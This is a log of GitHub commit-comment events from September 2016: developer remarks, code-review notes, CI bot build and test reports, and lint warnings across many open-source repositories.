{"id":"4560676338","type":"CommitCommentEvent","actor":{"login":"pulponair"},"repo":{"name":"helhum/realurl"},"payload":{"comment":{"id":19014704,"position":null,"line":null,"path":null,"commit_id":"cf528734b7fc341a2a1f2b0cd019871217d3b705","created_at":"2016-09-14T08:55:44Z","updated_at":"2016-09-14T08:55:44Z","body":"Halleluja \n\nVon meinem iPhone gesendet\n\n> Am 14.09.2016 um 09:07 schrieb Felix Kopp <notifications@github.com>:\n> \n> Great!!\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-14T08:55:44Z"}
{"id":"4560681106","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19014717,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T08:56:44Z","updated_at":"2016-09-14T08:56:44Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1817 of 2391 tests passed, 0 test warnings)\n\n * 508 tests had: AUD diffs.\n * 492 tests had: EIO diffs.\n * 213 tests had: RDD diffs.\n * 470 tests had: Table big diffs.\n * 141 tests had: ERR diffs.\n * 372 tests had: MTD diffs.\n * 271 tests had: DXF diffs.\n * 397 tests had: SHD diffs.\n * 406 tests had: BND diffs.\n * 298 tests had: MDD diffs.\n * 184 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 8 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.99%25-red.svg)</a> \n"}},"created_at":"2016-09-14T08:56:44Z"}
{"id":"4560682020","type":"CommitCommentEvent","actor":{"login":"phistuck"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19014718,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T08:56:53Z","updated_at":"2016-09-14T08:56:53Z","body":"Yes, that seems to have been a mistake or an oversight. This is generally not the case..."}},"created_at":"2016-09-14T08:56:53Z"}
{"id":"4560682511","type":"CommitCommentEvent","actor":{"login":"yusuke"},"repo":{"name":"yusuke/twitter4j"},"payload":{"comment":{"id":19014719,"position":null,"line":null,"path":null,"commit_id":"03f796730587ce938f9cbedf9763cbb4e6b52319","created_at":"2016-09-14T08:56:59Z","updated_at":"2016-09-14T08:56:59Z","body":"Yup\n-- \nYusuke Yamamoto\n@yusukey\nhttp://samuraism.com/\n\n\n\n> On Sep 14, 2016, at 17:46, Lalit <notifications@github.com> wrote:\n> \n> Hi,\n> Has this fix been is part of v 4.0.5?\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-14T08:56:59Z"}
{"id":"4560683698","type":"CommitCommentEvent","actor":{"login":"cldmnky"},"repo":{"name":"ExpressenAB/exp-containership"},"payload":{"comment":{"id":19014723,"position":null,"line":null,"path":null,"commit_id":"9f03068f492940c5a5d7c7d3fc6c9eafa38b59a7","created_at":"2016-09-14T08:57:15Z","updated_at":"2016-09-14T08:57:15Z","body":"🎉  👍 "}},"created_at":"2016-09-14T08:57:15Z"}
{"id":"4560687372","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"opengisch/QFieldSync"},"payload":{"comment":{"id":19014731,"position":1,"line":1,"path":"qfieldsync/utils/qgis2compat.py","commit_id":"b43583f25fd91ec496d26afea416ea71271b232c","created_at":"2016-09-14T08:58:01Z","updated_at":"2016-09-14T08:58:01Z","body":"@carolinux \r\n\r\nFYI, I started a compatibility layer here for QGIS 2.\r\nIn the code all calls will be QGIS 3 compatible and within this file, we will patch the API if QGIS 2 is found. I hope this is suitable not only for this project. Please keep developing with QGIS 2 (as that's what users will also use for the moment)."}},"created_at":"2016-09-14T08:58:01Z"}
{"id":"4560687596","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19014733,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T08:58:03Z","updated_at":"2016-09-14T08:58:03Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T08:58:03Z"}
{"id":"4560688006","type":"CommitCommentEvent","actor":{"login":"szatom"},"repo":{"name":"brainsum/paragraphs"},"payload":{"comment":{"id":19014734,"position":null,"line":null,"path":null,"commit_id":"c322fac18abda63838c880ca71ec9174ba849b42","created_at":"2016-09-14T08:58:09Z","updated_at":"2016-09-14T08:58:09Z","body":"The template have to be defined in module, because module use it in Controller. So if you switch site theme (or using another for admin interface) you will receive an error:\r\nTheme hook campaign_403/campaign_403 not found."}},"created_at":"2016-09-14T08:58:09Z"}
{"id":"4560690616","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19014739,"position":null,"line":null,"path":null,"commit_id":"9fef3e5d72fd2c1b58c2015690e548bb32baffe8","created_at":"2016-09-14T08:58:42Z","updated_at":"2016-09-14T08:58:42Z","body":"That is good.  I will get rid of `_config_dev.yml` and adjust the `.serve` script to set the `baseurl` parameter there.  "}},"created_at":"2016-09-14T08:58:42Z"}
{"id":"4560693789","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19014747,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-14T08:59:24Z","updated_at":"2016-09-14T08:59:24Z","body":"Just to be sure, did you try the latest one with `writeXml` method or the one with the `template CORE_EXPORT` code?"}},"created_at":"2016-09-14T08:59:24Z"}
{"id":"4560696079","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"qwat/qwat-data-model"},"payload":{"comment":{"id":19014757,"position":null,"line":null,"path":null,"commit_id":"9d64db425879983c2102f9684e4617524c359f81","created_at":"2016-09-14T08:59:53Z","updated_at":"2016-09-14T08:59:53Z","body":"can you place this in a distinct file?\r\nThis file is a copy https://github.com/2ndQuadrant/audit-trigger/commits/master/audit.sql with some modification to enable schema qualified tables. I would still like to make this changes upstream, so it would be easier to add a submodule later on."}},"created_at":"2016-09-14T08:59:53Z"}
{"id":"4560706887","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014782,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-14T09:02:06Z","updated_at":"2016-09-14T09:02:06Z","body":"Shnoulle, yes, I removed my comment because I noticed your fix 3 minutes later."}},"created_at":"2016-09-14T09:02:06Z"}
{"id":"4560708137","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19014783,"position":null,"line":null,"path":null,"commit_id":"8dc4bfca7435b5b65be4af7fb657e80ac328cd63","created_at":"2016-09-14T09:02:21Z","updated_at":"2016-09-14T09:02:21Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2314 of 2469 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dc4bfca7435b5b65be4af7fb657e80ac328cd63-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dc4bfca7435b5b65be4af7fb657e80ac328cd63-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.72%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T09:02:21Z"}
{"id":"4560709744","type":"CommitCommentEvent","actor":{"login":"tunturn"},"repo":{"name":"nikhil18/lightning-kernel-bacon"},"payload":{"comment":{"id":19014785,"position":null,"line":null,"path":null,"commit_id":"f273e11bcf9ef336ff0f24e71d475531da9ef7dd","created_at":"2016-09-14T09:02:41Z","updated_at":"2016-09-14T09:02:41Z","body":"This should be reverted \r\nArticle: http://www.phoronix.com/scan.php?page=news_item&px=MTE4NTg\r\nCommit info: https://github.com/sonyxperiadev/kernel/commit/37407ea7f93864c2cfc03edf8f37872ec539ea2b\r\n"}},"created_at":"2016-09-14T09:02:41Z"}
{"id":"4560717751","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19014803,"position":null,"line":null,"path":null,"commit_id":"0beec2fccc69957b983aa08706cb1df31b349c86","created_at":"2016-09-14T09:04:18Z","updated_at":"2016-09-14T09:04:18Z","body":"TeamCity Todo :: Build [Build 93](http://109.103.226.38:8512/viewLog.html?buildId=38486&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-14T09:04:18Z"}
{"id":"4560718287","type":"CommitCommentEvent","actor":{"login":"EnderKenji"},"repo":{"name":"iBa4x/VIP1b"},"payload":{"comment":{"id":19014806,"position":null,"line":null,"path":null,"commit_id":"878af6cb2c27ff5def4c54d71706d41bbcdc13d0","created_at":"2016-09-14T09:04:24Z","updated_at":"2016-09-14T09:04:24Z","body":"hi, can u check your twitter? :)"}},"created_at":"2016-09-14T09:04:24Z"}
{"id":"4560718529","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014807,"position":null,"line":null,"path":null,"commit_id":"154e026fbe6e53037e46a8c30f2b837459235acc","created_at":"2016-09-14T09:04:27Z","updated_at":"2016-09-14T09:04:27Z","body":"https://github.com/SondagesPro/LimeSurvey-SondagesPro/commit/9d922b604e0af129c7e03b3d32814d0f8b5b2b4b"}},"created_at":"2016-09-14T09:04:27Z"}
{"id":"4560719056","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19014808,"position":null,"line":null,"path":null,"commit_id":"8825a211581a463e8c9312a204ee81e00163ecdf","created_at":"2016-09-14T09:04:34Z","updated_at":"2016-09-14T09:04:34Z","body":"TeamCity Todo :: Build [Build 94](http://109.103.226.38:8512/viewLog.html?buildId=38487&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-14T09:04:34Z"}
{"id":"4560720555","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19014812,"position":null,"line":null,"path":null,"commit_id":"0beec2fccc69957b983aa08706cb1df31b349c86","created_at":"2016-09-14T09:04:53Z","updated_at":"2016-09-14T09:04:53Z","body":"TeamCity Todo :: Build [Build 93](http://109.103.226.38:8512/viewLog.html?buildId=38486&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 8 Build time: 00:00:38"}},"created_at":"2016-09-14T09:04:53Z"}
{"id":"4560722465","type":"CommitCommentEvent","actor":{"login":"csutcliff"},"repo":{"name":"joelpob/betfairng"},"payload":{"comment":{"id":19014814,"position":null,"line":null,"path":null,"commit_id":"587ae109f7916d16a0d06687559a2015f2d9e75e","created_at":"2016-09-14T09:05:11Z","updated_at":"2016-09-14T09:05:11Z","body":"Hi, the exact opposite occurs for me, With -api works fine, without gives error 400."}},"created_at":"2016-09-14T09:05:11Z"}
{"id":"4560725294","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19014819,"position":null,"line":null,"path":null,"commit_id":"8825a211581a463e8c9312a204ee81e00163ecdf","created_at":"2016-09-14T09:05:43Z","updated_at":"2016-09-14T09:05:43Z","body":"TeamCity Todo :: Build [Build 94](http://109.103.226.38:8512/viewLog.html?buildId=38487&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:02"}},"created_at":"2016-09-14T09:05:43Z"}
{"id":"4560727521","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19014825,"position":null,"line":null,"path":null,"commit_id":"8825a211581a463e8c9312a204ee81e00163ecdf","created_at":"2016-09-14T09:06:12Z","updated_at":"2016-09-14T09:06:12Z","body":"TeamCity Todo :: Build [Build 95](http://109.103.226.38:8512/viewLog.html?buildId=38488&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-14T09:06:12Z"}
{"id":"4560728544","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19014827,"position":null,"line":null,"path":null,"commit_id":"8825a211581a463e8c9312a204ee81e00163ecdf","created_at":"2016-09-14T09:06:23Z","updated_at":"2016-09-14T09:06:23Z","body":"TeamCity Todo :: Build [Build 95](http://109.103.226.38:8512/viewLog.html?buildId=38488&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 8 Build time: 00:00:09"}},"created_at":"2016-09-14T09:06:23Z"}
{"id":"4560731030","type":"CommitCommentEvent","actor":{"login":"mcgi5sr2"},"repo":{"name":"SonyAosp/vendor_google"},"payload":{"comment":{"id":19014834,"position":null,"line":null,"path":null,"commit_id":"7e93bea2c516d1359dd883debf478f0d30103837","created_at":"2016-09-14T09:06:55Z","updated_at":"2016-09-14T09:06:55Z","body":"dropping photos would leave us without a gallery app"}},"created_at":"2016-09-14T09:06:55Z"}
{"id":"4560731653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19014839,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T09:07:04Z","updated_at":"2016-09-14T09:07:04Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1468 of 1785 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-82.24%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-57.72%25-red.svg)</a>\n"}},"created_at":"2016-09-14T09:07:04Z"}
{"id":"4560734428","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19014848,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-14T09:07:38Z","updated_at":"2016-09-14T09:07:38Z","body":"I used the commit with the template CORE_EXPORT"}},"created_at":"2016-09-14T09:07:38Z"}
{"id":"4560737850","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"SonyAosp/vendor_google"},"payload":{"comment":{"id":19014855,"position":null,"line":null,"path":null,"commit_id":"7e93bea2c516d1359dd883debf478f0d30103837","created_at":"2016-09-14T09:08:21Z","updated_at":"2016-09-14T09:08:21Z","body":"This answer you ? \r\n\r\nhttps://github.com/opengapps/aosp_build/blob/master/opengapps-packages.mk#L44"}},"created_at":"2016-09-14T09:08:21Z"}
{"id":"4560738509","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19014858,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-14T09:08:28Z","updated_at":"2016-09-14T09:08:28Z","body":"Issue in esptool repo: https://github.com/themadinventor/esptool/issues/125"}},"created_at":"2016-09-14T09:08:28Z"}
{"id":"4560741561","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19014864,"position":null,"line":null,"path":null,"commit_id":"9cd6a8c1ae2ad2af5ec56e0dbf6852f3ebf9e005","created_at":"2016-09-14T09:09:07Z","updated_at":"2016-09-14T09:09:07Z","body":"Is it an idea to remove the name from the field, then?"}},"created_at":"2016-09-14T09:09:07Z"}
{"id":"4560747701","type":"CommitCommentEvent","actor":{"login":"argon"},"repo":{"name":"argon/mas"},"payload":{"comment":{"id":19014878,"position":null,"line":null,"path":null,"commit_id":"3a02d7b7df68391484f12bb4e9a2043061d765e2","created_at":"2016-09-14T09:10:24Z","updated_at":"2016-09-14T09:10:24Z","body":"Oops, used the wrong release script 1.2.2 should be fixed"}},"created_at":"2016-09-14T09:10:24Z"}
{"id":"4560749035","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"odedmagger/CuisineRoRTraining"},"payload":{"comment":{"id":19014882,"position":10,"line":9,"path":"app/controllers/restaurants_controller.rb","commit_id":"6b47a0f3c094cab014e03b36eb6b326114566c95","created_at":"2016-09-14T09:10:40Z","updated_at":"2016-09-14T09:10:40Z","body":"* try to use only `&&` and is cool and I like it but it's not == &&\r\n* no need to compare twice if params[:select_cuisine] is nil it won't equal all"}},"created_at":"2016-09-14T09:10:40Z"}
{"id":"4560750274","type":"CommitCommentEvent","actor":{"login":"YEGUCHEN"},"repo":{"name":"YEGUCHEN/Hello-it-s-me"},"payload":{"comment":{"id":19014886,"position":null,"line":null,"path":null,"commit_id":"b4792a57982a11c76a6e23e33ca3976a89ef135c","created_at":"2016-09-14T09:10:54Z","updated_at":"2016-09-14T09:10:54Z","body":"111"}},"created_at":"2016-09-14T09:10:54Z"}
{"id":"4560753660","type":"CommitCommentEvent","actor":{"login":"dran7505"},"repo":{"name":"Alexpux/MSYS2-packages"},"payload":{"comment":{"id":19014900,"position":null,"line":null,"path":null,"commit_id":"92dbd5ca866cac254a9bfe3dd3c696d3ab2a9175","created_at":"2016-09-14T09:11:35Z","updated_at":"2016-09-14T09:11:35Z","body":"Thanks"}},"created_at":"2016-09-14T09:11:35Z"}
{"id":"4560753911","type":"CommitCommentEvent","actor":{"login":"nicolas-bastien"},"repo":{"name":"getgrav/grav"},"payload":{"comment":{"id":19014901,"position":null,"line":null,"path":null,"commit_id":"8d7ab6fdd38eb07791a304f7b591995b323aa992","created_at":"2016-09-14T09:11:38Z","updated_at":"2016-09-14T09:11:38Z","body":"ok I found in setup that it should be create if not exist, I guess I just have file permission issue."}},"created_at":"2016-09-14T09:11:38Z"}
{"id":"4560754130","type":"CommitCommentEvent","actor":{"login":"hashmee"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19014903,"position":null,"line":null,"path":null,"commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:11:41Z","updated_at":"2016-09-14T09:11:41Z","body":"please use html beautify if you are using sublime"}},"created_at":"2016-09-14T09:11:41Z"}
{"id":"4560756392","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"odedmagger/CuisineRoRTraining"},"payload":{"comment":{"id":19014908,"position":11,"line":10,"path":"app/controllers/restaurants_controller.rb","commit_id":"6b47a0f3c094cab014e03b36eb6b326114566c95","created_at":"2016-09-14T09:12:11Z","updated_at":"2016-09-14T09:12:11Z","body":"maybe assign this to a variable\r\n`@cuisine_type = params[:]`"}},"created_at":"2016-09-14T09:12:11Z"}
{"id":"4560757383","type":"CommitCommentEvent","actor":{"login":"joozek78"},"repo":{"name":"PuppetJs/PuppetJs"},"payload":{"comment":{"id":19014910,"position":14,"line":493,"path":"src/puppet.js","commit_id":"47cb56afa0c8611254ad72a04a3d707c6551e760","created_at":"2016-09-14T09:12:22Z","updated_at":"2016-09-14T09:12:22Z","body":"@tomalec did you also update the usages of `connectToRemote`?"}},"created_at":"2016-09-14T09:12:22Z"}
{"id":"4560757408","type":"CommitCommentEvent","actor":{"login":"hashmee"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19014911,"position":6,"line":6,"path":"business.html","commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:12:23Z","updated_at":"2016-09-14T09:12:23Z","body":"add stylings on cascading style sheets"}},"created_at":"2016-09-14T09:12:23Z"}
{"id":"4560759082","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"odedmagger/CuisineRoRTraining"},"payload":{"comment":{"id":19014917,"position":13,"line":16,"path":"app/views/restaurants/index.html.erb","commit_id":"6b47a0f3c094cab014e03b36eb6b326114566c95","created_at":"2016-09-14T09:12:43Z","updated_at":"2016-09-14T09:12:43Z","body":"if you assign the value of params[:select_cusiine] to a variable `@foo`\r\nyou can then use it here as a value"}},"created_at":"2016-09-14T09:12:43Z"}
{"id":"4560760359","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"argon/mas"},"payload":{"comment":{"id":19014924,"position":null,"line":null,"path":null,"commit_id":"3a02d7b7df68391484f12bb4e9a2043061d765e2","created_at":"2016-09-14T09:12:58Z","updated_at":"2016-09-14T09:12:58Z","body":"No worries, thanks."}},"created_at":"2016-09-14T09:12:58Z"}
{"id":"4560760899","type":"CommitCommentEvent","actor":{"login":"hashmee"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19014927,"position":38,"line":38,"path":"business.html","commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:13:05Z","updated_at":"2016-09-14T09:13:05Z","body":"please download the files and fetch it from local. do not use weblinks"}},"created_at":"2016-09-14T09:13:05Z"}
{"id":"4560761196","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19014929,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-14T09:13:09Z","updated_at":"2016-09-14T09:13:09Z","body":"Why there? esp-udev-rules would be a Fedora-specific thing; esptool is a cross-platform tool. Is the esptool upstream even using Fedora?"}},"created_at":"2016-09-14T09:13:09Z"}
{"id":"4560762143","type":"CommitCommentEvent","actor":{"login":"hashmee"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19014932,"position":39,"line":39,"path":"business.html","commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:13:21Z","updated_at":"2016-09-14T09:13:21Z","body":"same comment as above"}},"created_at":"2016-09-14T09:13:21Z"}
{"id":"4560762619","type":"CommitCommentEvent","actor":{"login":"wking"},"repo":{"name":"opencontainers/runc"},"payload":{"comment":{"id":19014933,"position":26,"line":321,"path":"libcontainer/init_linux.go","commit_id":"5caf3898aedfd6d1a32d25b3849258d8488b9e90","created_at":"2016-09-14T09:13:26Z","updated_at":"2016-09-14T09:13:26Z","body":"It's also possible for the mounted devpts to prefer a different UID (see mount(8)).  The reason you'd want to set this is if you, like grantpt, want to have the UID be something you didn't want to hard-code at mount time to apply to all future pseudoterminal slaves."}},"created_at":"2016-09-14T09:13:26Z"}
{"id":"4560763826","type":"CommitCommentEvent","actor":{"login":"hashmee"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19014964,"position":18,"line":18,"path":"business.html","commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:13:39Z","updated_at":"2016-09-14T09:13:39Z","body":"remove space after hover"}},"created_at":"2016-09-14T09:13:39Z"}
{"id":"4560763985","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"odedmagger/CuisineRoRTraining"},"payload":{"comment":{"id":19014965,"position":6,"line":34,"path":"app/assets/stylesheets/restaurants.scss","commit_id":"4cd3bb1ef7e1ae3c7cf67a3e6145049e253037f9","created_at":"2016-09-14T09:13:41Z","updated_at":"2016-09-14T09:13:41Z","body":"standard in css is to break them into different lines "}},"created_at":"2016-09-14T09:13:41Z"}
{"id":"4560766335","type":"CommitCommentEvent","actor":{"login":"hashmee"},"repo":{"name":"shaikmutherpasha/js"},"payload":{"comment":{"id":19014970,"position":5,"line":5,"path":"business.html","commit_id":"58f9f5ab5f5ec967da8f8988640a170cf72a0faf","created_at":"2016-09-14T09:14:12Z","updated_at":"2016-09-14T09:14:12Z","body":"please fetch the file from local donot use web link"}},"created_at":"2016-09-14T09:14:12Z"}
{"id":"4560768127","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19014975,"position":null,"line":null,"path":null,"commit_id":"92b95883cc96a1b3e32d5dde97d57e4334b73707","created_at":"2016-09-14T09:14:31Z","updated_at":"2016-09-14T09:14:31Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are 